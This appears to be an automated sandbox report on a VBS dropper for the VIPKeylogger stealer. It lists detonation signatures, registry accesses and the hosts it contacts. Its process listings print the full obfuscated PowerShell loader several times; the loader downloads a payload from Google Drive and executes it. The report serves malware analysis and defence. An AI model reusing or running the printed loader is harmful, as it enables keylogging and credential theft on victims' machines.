Malware Analysis Report

2024-11-30 15:01

Sample ID 241031-echfws1jcl
Target bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs
SHA256 bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3
Tags
discovery execution vipkeylogger collection keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3

Threat Level: Known bad

The file bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs was found to be: Known bad.

Malicious Activity Summary

discovery execution vipkeylogger collection keylogger stealer

VIPKeylogger

Vipkeylogger family

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious use of AdjustPrivilegeToken

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-31 03:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 03:47

Reported

2024-10-31 03:50

Platform

win7-20240708-en

Max time kernel

150s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens (Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

Network

N/A

Files

memory/2756-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2756-5-0x000000001B480000-0x000000001B762000-memory.dmp

memory/2756-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-6-0x0000000002A60000-0x0000000002A68000-memory.dmp

memory/2756-8-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-10-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-11-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2756-12-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-13-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-14-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2756-16-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 03:47

Reported

2024-10-31 03:50

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens (Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW 